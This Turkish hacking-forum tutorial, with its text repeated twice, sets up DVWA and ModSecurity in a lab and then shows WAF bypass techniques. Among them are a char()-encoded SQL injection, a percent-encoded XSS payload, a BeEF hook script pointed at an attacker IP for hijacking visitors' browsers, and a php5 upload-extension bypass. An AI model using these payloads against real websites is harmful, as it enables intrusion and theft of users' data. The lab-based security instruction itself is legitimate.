Değerli okurlar merhaba.
https://www.turkhackteam.org/web-server-guvenligi-ve-zafiyetler/1965104-waf-ve-bypass-edilmesi.html
Bu konuyu açtığımda @x4807 bana yazdı. Waf'ları daha iyi anlamam için öneriler ve kaynaklar verdi. Daha sonrasında bunu konu haline getirme fikrini verdi ve fikri beğendim. Kendisine de fikir ve takıldığım yerde yardımcı olduğu için teşekkür ederim . Fikrinde en çok güzel bulduğum kısım DVWA üzerine bir Waf kurup farkı göstermekti. Konu içeriğine şu şekilde karar verdik;
Bilinmesi Gereken Kavramlar
DVWA Os Command İnjection
WAF'ı Kurmak
WAF Bizi Nasıl Engelliyor
WAF'ı Nasıl Bypass Ederiz
Bu şekilde karar verdik. Güzel bir konu olması dileğiyle...
Bilinmesi Gereken Kavramlar
Öncelikle Waf'ın ne olduğunu bilelim. Waf'a güvenlik duvarı denebilir. Az çok bir önceki konumda anlattım zaten. Waf web sitesini zararlı bağlantılardan korumakla yükümlü bir application. Waf bünyesinde barındırdığı politikalara, kurallara ve listelere bakarak zararlı bağlantıları tespit eder ve onları engeller. DVWA'den bahsetmek gerekirse. DVWA Web güvenliği ile uğraşanların kendilerini yasal ve etik bir ortamda test etmesi için hazırlanmış bir web application'dur. Bu uygulama içerisinde bilerek açıklar bırakılmıştır, sebebi kendimizi eğitmektir. DVWA'in kurulumu için bir sonraki başlıktaki gibi de yapabilirsiniz veya farklı şekillerde de. Kurulumu zor olmayan bir sistemdir. Bu hazırladığım konu hem windows hem linux sistemlerden yapılabilir. Ama ben linux sisteminden ilerleyeceğim.
DVWA Os Command İnjection
DVWA'i artık biliyoruz. Os Command İnjection nedir derseniz bunun için şöyle bir konum bulunmakta: https://www.turkhackteam.org/siber-guvenlik/1960591-bwapp-5-os-command-injection.html . Bu konuya göz atabilirsiniz. Anladıktan sonra şimdi DVWA'i açıp Os Command İnjection'u örneği ile göstereceğim. Sonrasında bir waf kurup bir de öyle bakacağız bakalım ne olacak.
Kodlarını terminal üzerinde çalıştırdıktan sonra local ip mize giriş yapıp dvwa'i açabilirsiniz.
Burayı gerçek bir web sitesi olarak düşünelim. Bir ping atma web sitesi, hedefin Ip'yi giriyoruz ve hedefe pingler yolluyor. Burda bir command injection'u tespit ettikten sonra neler yapabiliriz? Görmememiz dizinler içinde gezebiliriz, NetCat ile sistemi dinleyebiliriz en basitinden.
İlk resimde hedef bir IP adresi girdim ve noktalı virgül ile ls komutunu girdiğimde gerekli bilgiler karşıma çıktı. İkinci resimde ise görünmüyor ama orda hedef ip yi girip noktalı virgül yerine | kullandım. Bu sefer bu şekilde çıktı verdi. Os Command İnjection burda var. Şuanda bizi engelleyen bir waf yok ama mutlaka real de karşımıza çıkan web sitelerinde olacaktır.
Waf'ı Kurmak
Waf'ı kurmadan önce DVWA'i kuracağız birlikte. DVWA'in kurulumunu burdan da öğrenebilirsiniz. Waf olarak ModSecurity wafını düşündük. Yapmamız gereken önce Google da github dvwa yazıp kodu almak.
Kodlarını terminalde çalıştırınca Masaüstüne DVWA paketleri gelcektir.
Bizim apache server'ının olduğu dizine bunu gönderiyoruz.
Yapıyoruz ve apache2 ile mysql server'ımızı çalıştırıyoruz. DVWA'in çalışması için bir MySql user'ı database'i oluşturmamız gerek. Sırasıyla şu komutları çalıştırın.
# mysql'e geçtik #
# dvwa adlı bir veri tabanı oluşturduk #
# dvwa adlı veri tabanına tüm yetkileri verdik #
# tüm komutların çalıştırılmasına izin verdik #
# DVWA adlı bir user oluşturduk #
# Tüm izinleri verdik #
# Kodları çalıştırılabilir yaptık #
Daha sonra CTRL+C ile çıkış yapabilirsiniz.
Kodunu çalıştırarak dist'i ordan sildik php olarak çalışmasını istiyoruzç
Mousepad ile açıyoruz. Bir takım değişiklikler yapacağız burda. Kendi belirlediğimiz database bilgilerini gireceğiz.
Bilgiler aynen bu şekilde olmalı.
Yaparak gerekli tüm izinleri veriyoruz. Şimdi ise ModSecurity kuracağız. clear çekip ekranı temizleyebilirsiniz.
Kodunu terminalde çalıştırarak indiriyoruz. Y/n sorularına Y diyip enter basıyoruz. Modsecurity'nin daha bir güçlü halini yükleyeceğiz ekstra olarak. OWASP için geliştirilmiş olan bir hali yani tamamıyla OWASP açıklarına karşı şuan yaptığımıza göre daha güçlü.
Kodu ile gerekli paketleri yüklüyoruz.
İndirdiğimiz dosyaya geçiyoruz. ls ile içine bakıyoruz. Gerekli kurulum uygulamalarını çalıştıracağız.
Gerekli dosya taşımaları yaptık.
Bu şekilde olacak.
Artık daha bir şey yapmayacağız. localhost/DVWA/login.php den username : admin password: password olarak giriş yapabilirsiniz. Eğer bir hata alınırsa reset database yapın tekrar deneyin yine olmazsa user'larda bir hata var demektir. Bu durum config dosyasından dolayı oluyor. config.inc.php dosyasını açıp DB ismini de DVWA olarak değiştirip tekrar deneyin.
DVWA açıldıktan sonra bir xss script i çalıştıralım low levelda.
Gayet başarılı bir şekilde çalıştırdı. Çalıştırmaması yani engellemesi gereken kuralı yapmak için.
Çalıştırıp SecRules buluyoruz.
DetecedOnly olan yer bize şunu yaptırıyor. Altdaki tüm kurallar çalıştırılıyor ama modsecurity herhangi bir engelleme işlemi yapmyıyor sadece log tutuyor yani kendisine gelen isteklerin kayıtları gibi. Bunu On yapıyoruz. DetecedOnly yerine On yapıp tekrar deniyoruz. Bu sefer DVWA'de script çalıştırınca bize 403 hatası döndürecektir wafın engellediğini burdan anlayabilirsiniz.
Waf'ların Bypass Edilmesi
Wafın türüne göre, güncelliğine göre, güvenliğine göre wafların atlatmanın yolları var. Güvenli olmayan waflar saf waflardır. Yapacağımız numaraları yiyebilmektedirler. Yazılı makale halinde wafların nasıl bypass edildiğini hayali örnekler ile göstereceğim.
SQL İnjection'da Örnek Waf Bypass
Bypass için bir çok yöntem var. Önce char yönteminden bahsedelim. Char yöntemi MySQL'de filtrelenen komutları sistemi kandırarak veri tabanından geçirmemize olanak sağlıyor. Bunu bizim veri tabanına attığımız ascii karakterleri encode ederek yapıyor. " Bilgisayarda yapılan her işlemin karşılığı vardır" Burda denmek istenen 1 ve 0 lar aslında. Char yöntemi de karakterleri bu tarz sayılara getiriyor. Bunun nasıl hesaplandığını ascii sayıların karşılığı olarak araştırabilirsiniz. Örneğin waflı bir web sitesinde şöyle bir union select çalıştırmaya çalıştığımızı var sayalım.
Veri tabanına bu isteği yaptığımızda waf kötü amaçlı algılayıp bizi engelleyecektir. Char yöntemi ile bunu nasıl aşacağımıza bakalım.
Bu nedir derseniz. Bahsettiğim gibi aslında iki kod aynı şey. Sadece biri harf karakterlerini bu tarz sistemsel dile çeviriyor. Burda char'ın yaptığı şey dvwa'i bölerek sisteme bu sayılar halinde parça parça göndermektedir. Bu şekilde sistem önce d yi alır daha sonra v yi alır böyle gider. Sistem derken wafı'dan da bahsediyorum. Waf böylelikle bizi engelleyememiş olacak ve burda onu bypass ettik aslında. Burda dvwa'i encode ederek waf'dan böylelikle geçirdik.
Stored XSS'de Waf
XSS'i olan bir web sitesi düşünelim. Site adresine scriptler ile zararlı bir exe dosyası enjekte ettiğimizi düşünelim. Kullanıcılar buna tıkladığında yürütülebilir exe inecektir. Bu durumu yapmamıza yarayan açık depolanan xss açığı. Waf'lar karakter filtrelemeleri sayesinde girilen bu script'ler, alert'lar, union'lar vs. bunları engelleyebiliyor. XSS üzerinden giderek nasıl bypass edildiği hakkında düşüneceğiz. Öncelikle web sitesinde şu isteği yollayalm.
İsteği yolladığımızda waf'ın karakter filtrelemeliri durumunda burdaki script'i görünce bizi engelleyecektir. Belki bize IP banı bile atabilir. Bunun önüne geçmenin yöntemi bir önceki konumun sonlarında bahsi geçen Percent Encoding yöntemidir. Bu yöntemde bazı karakterleri url bir hale getirerek sistemi kandırıyoruz.
Karmaşık gelebilir aslında iki kod da aynı. Sadece birinde Percent Encoding kullanılıyor. Karakterlerin Percent Encoding karşılığını burp suite üzerinden bile bakabilirsiniz. Daha kolayı google'dan bakmak. Başka yöntemler ise yine bir önceki konumda bahsi geçen tamper yönteminde karakterleri bozuk hallere getirerek sistemi kandırıyoruz. Bunları da github XSS Cheat Sheet olarak araştırabilirsiniz.
XSS'de BeFF Ve Bypass'ı
Öncelikle şunu diyeyim ki Waf Bypasslamanın geneli Percent Encoding ve Tamper yönteminden geçiyor. Aynı durum XSS GET ve POST da da var. BeFF'i çok kısa anlatmak isterim. XSS açıklarından yararlanarak bir JS oltası hazırlıyoruz ve hedef siteye enjekte ediyoruz. Bu bir GET de olabilir POST da. Daha sonra enjekte edilen yere eğer POST ise kim gelirse sizin oltanıza takılacak ve onun tarayıcısnı hacklemiş olacaksınız. Bu durumda bazı sosyal mühendislik işlemleri ile kişinin bilgilerini çalabilirsiniz. GET ise özel olarak o URL yi sosyal mühendislik yaparak atıp oltamanız gerekmekte. Bunu yapmak için xss olan bir yerde önce beefimizi çalıştırıyoruz daha sonra şu isteği atıyoruz;
Yapıyoruz. Tabi burdaki selenia.com uydurma bir şey. Bunu yaptığımızda Waf'ın bizi engellemesi durumunda. Yine Percent Encoding yöntemine ve Tamper yöntemine başvurabilir. Hatta ikisi aynı anda da kullanılarak daha güzel bir bypass yöntemi yapılabilir. Genel olarak bu şekilde. Ama açıklara göre bypass edilmesi değişebiliyor.
Ben genel olarak Port Encoding dedim ama açığa göre bu değişir. Ama aslında mantık olarak hepsi filtrelemeleri geçmek için. Upload açığı için şöyle bir konum var : https://www.turkhackteam.org/siber-...-4-php-enjeksiyonlari-sitede-shell-acmak.html Bu konumu da incelerseniz az çok anlarsınız. Şunu söylemeliyim ki anlattığım konular anlattığım içeriğin çok çok çok az kısmı denebilir. Çok daha derin işler var. Neyse, burdaki durumda wafı bpyass etmek için php yerine php5 gibi bir dosya oluşturup öyle içeri almışız. waf yok aslında ama böyle yapılabilir. Burda waf uzantıya baktığında php yi görüyor ve almıyor ama php5 i görünce alıyor. Buna sebep olan durum yazılımcımızın filtrelemede şunu yapmamış olması " php den sonra ne gelirse gelsin sen bunu yeme içeri alma" tabi bunu yazılımsal halde yapması gerek
Yapmazsa böyle durumlar oluyor.
Konum bu kadardı. Umarım güzel ve yararlı bir konu olmuştur. Okuyanlara teşekkür ederim iyi forumlar
)
https://www.turkhackteam.org/web-server-guvenligi-ve-zafiyetler/1965104-waf-ve-bypass-edilmesi.html
Bu konuyu açtığımda @x4807 bana yazdı. Waf'ları daha iyi anlamam için öneriler ve kaynaklar verdi. Daha sonrasında bunu konu haline getirme fikrini verdi ve fikri beğendim. Kendisine de fikir ve takıldığım yerde yardımcı olduğu için teşekkür ederim . Fikrinde en çok güzel bulduğum kısım DVWA üzerine bir Waf kurup farkı göstermekti. Konu içeriğine şu şekilde karar verdik;
Bilinmesi Gereken Kavramlar
DVWA Os Command İnjection
WAF'ı Kurmak
WAF Bizi Nasıl Engelliyor
WAF'ı Nasıl Bypass Ederiz
Bu şekilde karar verdik. Güzel bir konu olması dileğiyle...
Bilinmesi Gereken Kavramlar
Öncelikle Waf'ın ne olduğunu bilelim. Waf'a güvenlik duvarı denebilir. Az çok bir önceki konumda anlattım zaten. Waf web sitesini zararlı bağlantılardan korumakla yükümlü bir application. Waf bünyesinde barındırdığı politikalara, kurallara ve listelere bakarak zararlı bağlantıları tespit eder ve onları engeller. DVWA'den bahsetmek gerekirse. DVWA Web güvenliği ile uğraşanların kendilerini yasal ve etik bir ortamda test etmesi için hazırlanmış bir web application'dur. Bu uygulama içerisinde bilerek açıklar bırakılmıştır, sebebi kendimizi eğitmektir. DVWA'in kurulumu için bir sonraki başlıktaki gibi de yapabilirsiniz veya farklı şekillerde de. Kurulumu zor olmayan bir sistemdir. Bu hazırladığım konu hem windows hem linux sistemlerden yapılabilir. Ama ben linux sisteminden ilerleyeceğim.
DVWA Os Command İnjection
DVWA'i artık biliyoruz. Os Command İnjection nedir derseniz bunun için şöyle bir konum bulunmakta: https://www.turkhackteam.org/siber-guvenlik/1960591-bwapp-5-os-command-injection.html . Bu konuya göz atabilirsiniz. Anladıktan sonra şimdi DVWA'i açıp Os Command İnjection'u örneği ile göstereceğim. Sonrasında bir waf kurup bir de öyle bakacağız bakalım ne olacak.
Kod:
service apache2 start
Kod:
service mysql startBurayı gerçek bir web sitesi olarak düşünelim. Bir ping atma web sitesi, hedefin Ip'yi giriyoruz ve hedefe pingler yolluyor. Burda bir command injection'u tespit ettikten sonra neler yapabiliriz? Görmememiz dizinler içinde gezebiliriz, NetCat ile sistemi dinleyebiliriz en basitinden.
İlk resimde hedef bir IP adresi girdim ve noktalı virgül ile ls komutunu girdiğimde gerekli bilgiler karşıma çıktı. İkinci resimde ise görünmüyor ama orda hedef ip yi girip noktalı virgül yerine | kullandım. Bu sefer bu şekilde çıktı verdi. Os Command İnjection burda var. Şuanda bizi engelleyen bir waf yok ama mutlaka real de karşımıza çıkan web sitelerinde olacaktır.
Waf'ı Kurmak
Waf'ı kurmadan önce DVWA'i kuracağız birlikte. DVWA'in kurulumunu burdan da öğrenebilirsiniz. Waf olarak ModSecurity wafını düşündük. Yapmamız gereken önce Google da github dvwa yazıp kodu almak.
Kod:
cd Desktop
Kod:
git clone https://github.com/digininja/DVWA.git
Kod:
mv /root/Desktop/DVWA /var/www/html
Kod:
service apache2 start
Kod:
service mysql startYapıyoruz ve apache2 ile mysql server'ımızı çalıştırıyoruz. DVWA'in çalışması için bir MySql user'ı database'i oluşturmamız gerek. Sırasıyla şu komutları çalıştırın.
Kod:
mysql -u root -p
Kod:
create database dvwa;
Kod:
grant all on dvwa.* to dvwa@localhost identified by 'xxx';
Kod:
flush privileges
Kod:
create user DVWA;
Kod:
grant all on DVWA.* to DVWA@localhost identified by 'password';
Kod:
flush privileges;# mysql'e geçtik #
# dvwa adlı bir veri tabanı oluşturduk #
# dvwa adlı veri tabanına tüm yetkileri verdik #
# tüm komutların çalıştırılmasına izin verdik #
# DVWA adlı bir user oluşturduk #
# Tüm izinleri verdik #
# Kodları çalıştırılabilir yaptık #
Daha sonra CTRL+C ile çıkış yapabilirsiniz.
Kod:
mv /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.phpKodunu çalıştırarak dist'i ordan sildik php olarak çalışmasını istiyoruzç
Kod:
mousepad /var/www/html/DVWA/config/config.inc.phpMousepad ile açıyoruz. Bir takım değişiklikler yapacağız burda. Kendi belirlediğimiz database bilgilerini gireceğiz.
Bilgiler aynen bu şekilde olmalı.
Kod:
chmod -R 777 /var/www/html/DVWAYaparak gerekli tüm izinleri veriyoruz. Şimdi ise ModSecurity kuracağız. clear çekip ekranı temizleyebilirsiniz.
Kod:
apt-get install libapache2-mod-security2Kodunu terminalde çalıştırarak indiriyoruz. Y/n sorularına Y diyip enter basıyoruz. Modsecurity'nin daha bir güçlü halini yükleyeceğiz ekstra olarak. OWASP için geliştirilmiş olan bir hali yani tamamıyla OWASP açıklarına karşı şuan yaptığımıza göre daha güçlü.
Kod:
git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.gitKodu ile gerekli paketleri yüklüyoruz.
Kod:
cd owasp-modsecurity-crs
Kod:
lsİndirdiğimiz dosyaya geçiyoruz. ls ile içine bakıyoruz. Gerekli kurulum uygulamalarını çalıştıracağız.
Kod:
mv crs-setup.conf.example /etc/modsecurity/crs/crs-setup.conf
Kod:
mv rules /etc/modsecurity/
Kod:
cd /etc/apache2/mods-enabled/Gerekli dosya taşımaları yaptık.
Kod:
mousepad security2.confBu şekilde olacak.
Kod:
cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity.conf
Kod:
service apache2 restart
Kod:
service mysql restartDVWA açıldıktan sonra bir xss script i çalıştıralım low levelda.
Gayet başarılı bir şekilde çalıştırdı. Çalıştırmaması yani engellemesi gereken kuralı yapmak için.
Kod:
cd /etc/modsecurity/
Kod:
ls
Kod:
mousepad modsecurity.confÇalıştırıp SecRules buluyoruz.
DetecedOnly olan yer bize şunu yaptırıyor. Altdaki tüm kurallar çalıştırılıyor ama modsecurity herhangi bir engelleme işlemi yapmyıyor sadece log tutuyor yani kendisine gelen isteklerin kayıtları gibi. Bunu On yapıyoruz. DetecedOnly yerine On yapıp tekrar deniyoruz. Bu sefer DVWA'de script çalıştırınca bize 403 hatası döndürecektir wafın engellediğini burdan anlayabilirsiniz.
Waf'ların Bypass Edilmesi
Wafın türüne göre, güncelliğine göre, güvenliğine göre wafların atlatmanın yolları var. Güvenli olmayan waflar saf waflardır. Yapacağımız numaraları yiyebilmektedirler. Yazılı makale halinde wafların nasıl bypass edildiğini hayali örnekler ile göstereceğim.
SQL İnjection'da Örnek Waf Bypass
Bypass için bir çok yöntem var. Önce char yönteminden bahsedelim. Char yöntemi MySQL'de filtrelenen komutları sistemi kandırarak veri tabanından geçirmemize olanak sağlıyor. Bunu bizim veri tabanına attığımız ascii karakterleri encode ederek yapıyor. " Bilgisayarda yapılan her işlemin karşılığı vardır" Burda denmek istenen 1 ve 0 lar aslında. Char yöntemi de karakterleri bu tarz sayılara getiriyor. Bunun nasıl hesaplandığını ascii sayıların karşılığı olarak araştırabilirsiniz. Örneğin waflı bir web sitesinde şöyle bir union select çalıştırmaya çalıştığımızı var sayalım.
Kod:
UNION SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema ="dvwa"Veri tabanına bu isteği yaptığımızda waf kötü amaçlı algılayıp bizi engelleyecektir. Char yöntemi ile bunu nasıl aşacağımıza bakalım.
Kod:
UNION SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema =char(100,118,119,97)Stored XSS'de Waf
XSS'i olan bir web sitesi düşünelim. Site adresine scriptler ile zararlı bir exe dosyası enjekte ettiğimizi düşünelim. Kullanıcılar buna tıkladığında yürütülebilir exe inecektir. Bu durumu yapmamıza yarayan açık depolanan xss açığı. Waf'lar karakter filtrelemeleri sayesinde girilen bu script'ler, alert'lar, union'lar vs. bunları engelleyebiliyor. XSS üzerinden giderek nasıl bypass edildiği hakkında düşüneceğiz. Öncelikle web sitesinde şu isteği yollayalm.
Kod:
selenia <script>alert(.....)</script>İsteği yolladığımızda waf'ın karakter filtrelemeliri durumunda burdaki script'i görünce bizi engelleyecektir. Belki bize IP banı bile atabilir. Bunun önüne geçmenin yöntemi bir önceki konumun sonlarında bahsi geçen Percent Encoding yöntemidir. Bu yöntemde bazı karakterleri url bir hale getirerek sistemi kandırıyoruz.
Kod:
selenia%22 %3E%3Cscript%3Ealert(.....)%3C%2fscript%3EKarmaşık gelebilir aslında iki kod da aynı. Sadece birinde Percent Encoding kullanılıyor. Karakterlerin Percent Encoding karşılığını burp suite üzerinden bile bakabilirsiniz. Daha kolayı google'dan bakmak. Başka yöntemler ise yine bir önceki konumda bahsi geçen tamper yönteminde karakterleri bozuk hallere getirerek sistemi kandırıyoruz. Bunları da github XSS Cheat Sheet olarak araştırabilirsiniz.
XSS'de BeFF Ve Bypass'ı
Öncelikle şunu diyeyim ki Waf Bypasslamanın geneli Percent Encoding ve Tamper yönteminden geçiyor. Aynı durum XSS GET ve POST da da var. BeFF'i çok kısa anlatmak isterim. XSS açıklarından yararlanarak bir JS oltası hazırlıyoruz ve hedef siteye enjekte ediyoruz. Bu bir GET de olabilir POST da. Daha sonra enjekte edilen yere eğer POST ise kim gelirse sizin oltanıza takılacak ve onun tarayıcısnı hacklemiş olacaksınız. Bu durumda bazı sosyal mühendislik işlemleri ile kişinin bilgilerini çalabilirsiniz. GET ise özel olarak o URL yi sosyal mühendislik yaparak atıp oltamanız gerekmekte. Bunu yapmak için xss olan bir yerde önce beefimizi çalıştırıyoruz daha sonra şu isteği atıyoruz;
Kod:
http://selenia.com/waffbypass.php?id= <script src="http://<IP>:3000/hook.js></scipt>Yapıyoruz. Tabi burdaki selenia.com uydurma bir şey. Bunu yaptığımızda Waf'ın bizi engellemesi durumunda. Yine Percent Encoding yöntemine ve Tamper yöntemine başvurabilir. Hatta ikisi aynı anda da kullanılarak daha güzel bir bypass yöntemi yapılabilir. Genel olarak bu şekilde. Ama açıklara göre bypass edilmesi değişebiliyor.
Upload Açığında Bypass
Ben genel olarak Port Encoding dedim ama açığa göre bu değişir. Ama aslında mantık olarak hepsi filtrelemeleri geçmek için. Upload açığı için şöyle bir konum var : https://www.turkhackteam.org/siber-...-4-php-enjeksiyonlari-sitede-shell-acmak.html Bu konumu da incelerseniz az çok anlarsınız. Şunu söylemeliyim ki anlattığım konular anlattığım içeriğin çok çok çok az kısmı denebilir. Çok daha derin işler var. Neyse, burdaki durumda wafı bpyass etmek için php yerine php5 gibi bir dosya oluşturup öyle içeri almışız. waf yok aslında ama böyle yapılabilir. Burda waf uzantıya baktığında php yi görüyor ve almıyor ama php5 i görünce alıyor. Buna sebep olan durum yazılımcımızın filtrelemede şunu yapmamış olması " php den sonra ne gelirse gelsin sen bunu yeme içeri alma" tabi bunu yazılımsal halde yapması gerek
Yapmazsa böyle durumlar oluyor.Konum bu kadardı. Umarım güzel ve yararlı bir konu olmuştur. Okuyanlara teşekkür ederim iyi forumlar
)
Son düzenleme:
( teşekkür ederim 
